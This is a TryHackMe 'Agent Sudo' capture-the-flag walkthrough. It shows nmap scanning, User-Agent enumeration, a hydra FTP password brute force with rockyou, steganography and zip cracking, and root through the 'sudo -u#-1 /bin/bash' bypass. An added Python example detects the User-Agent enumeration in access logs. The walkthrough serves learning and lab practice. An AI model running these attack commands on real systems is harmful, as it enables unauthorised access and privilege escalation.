TryHackMe Walkthrough | Agent Sudo

You found a secret server located under the deep sea. Your task is to hack inside the server and reveal the truth.

This walkthrough is written as part of the Master certificate in cybersecurity (Red Team) that I am pursuing from HackeU.

Reconnaissance

Starting with an nmap scan

nmap -sS -sV <ip>

We found that there are 3 ports open: port 21, port 22 and port 80.

As port 80 is open we will check the webpage for any information.

Here we have a hint “codename as user-agent” and the codenames are single letters as we see in the above screenshot; Agent R.

Intercepting the traffic in Burp and changing the user agent with Intruder until we get a hit.

For the letter C we get a hit.

Using this as the user agent.

Here we get a username chris
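Seen from the defender's side, the Intruder run above stands out in the web server's access log: one client sends a burst of requests whose User-Agent is a single letter. The following Python code is an added example, not part of the original walkthrough; it assumes Apache-style combined log lines, and the sample log lines, addresses, thresholds and function names are constructed for illustration.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Combined log format: ip - - [time] "request" status bytes "referer" "user-agent"
LINE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "[^"]*" \d{3} \S+ "[^"]*" "(?P<ua>[^"]*)"$'
)

def find_ua_enumeration(lines, min_distinct=5, window=timedelta(seconds=60)):
    """Return {ip: all one-letter User-Agents it sent} for clients that used at
    least min_distinct different one-letter User-Agent values within window."""
    seen = defaultdict(list)               # ip -> [(timestamp, ua), ...]
    for line in lines:
        m = LINE.match(line.strip())
        if not m:
            continue                       # not a combined-format line
        ua = m["ua"]
        if len(ua) == 1 and ua.isalpha():  # browsers do not send a bare letter
            ts = datetime.strptime(m["ts"], "%d/%b/%Y:%H:%M:%S %z")
            seen[m["ip"]].append((ts, ua))
    flagged = {}
    for ip, hits in seen.items():
        hits.sort()
        start = 0
        for end in range(len(hits)):
            while hits[end][0] - hits[start][0] > window:
                start += 1                 # slide the time window forward
            distinct = {ua for _, ua in hits[start:end + 1]}
            if len(distinct) >= min_distinct:
                flagged[ip] = sorted({ua for _, ua in hits})
                break
    return flagged

def sample_log():
    # Constructed sample: 192.0.2.10 cycles A..F in six seconds, 192.0.2.20 is
    # an ordinary browser, 192.0.2.30 sends a single one-letter User-Agent.
    lines = [
        f'192.0.2.10 - - [12/Mar/2022:10:00:{i:02d} +0000] "GET / HTTP/1.1" 200 218 "-" "{c}"'
        for i, c in enumerate("ABCDEF")
    ]
    lines.append('192.0.2.20 - - [12/Mar/2022:10:00:03 +0000] "GET / HTTP/1.1" 200 218 "-" "Mozilla/5.0 (X11; Linux x86_64)"')
    lines.append('192.0.2.30 - - [12/Mar/2022:10:05:00 +0000] "GET / HTTP/1.1" 200 218 "-" "C"')
    return lines

if __name__ == "__main__":
    for ip, uas in find_ua_enumeration(sample_log()).items():
        print(f"{ip}: cycled one-letter User-Agents {uas}")
```
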

Using hydra to crack the password for chris

hydra -l chris -P /usr/share/wordlists/rockyou.txt <IP> ftp 21

Successfully logged in the system.

Downloading the files to the host system and inspecting them

get <filename>

Checking To_agentJ.txt and we see that the password is stored in the pictures.

Using binwalk

binwalk cutie.png -e

Found 4 files

Cracking .zip file using zip2john

zip2john 8702.zip >test.txt

Cracking the hash in test.txt using john, we found the password to open the zip file.

Extracting 8702.zip using 7z

7z e 8702.zip

cat To_agentR.txt

Used CyberChef to crack the hint.

Used steghide to extract hidden message

steghide extract -sf cute-alien.jpg

Found password for agent James

Using the above information and the password we found to log in over SSH as user James

ssh james@<targetip>

User_flag.txt

Checking for privileges

sudo -l

Got root access

sudo -u#-1 /bin/bash

root.txt

Thanks for reading.


B.Sc IT Graduate with C.E.H certification currently pursuing Offensive Security (Red Team). Passion for MMA and Kick-boxing & Automobile Enthusiast.

Aditya Kumar
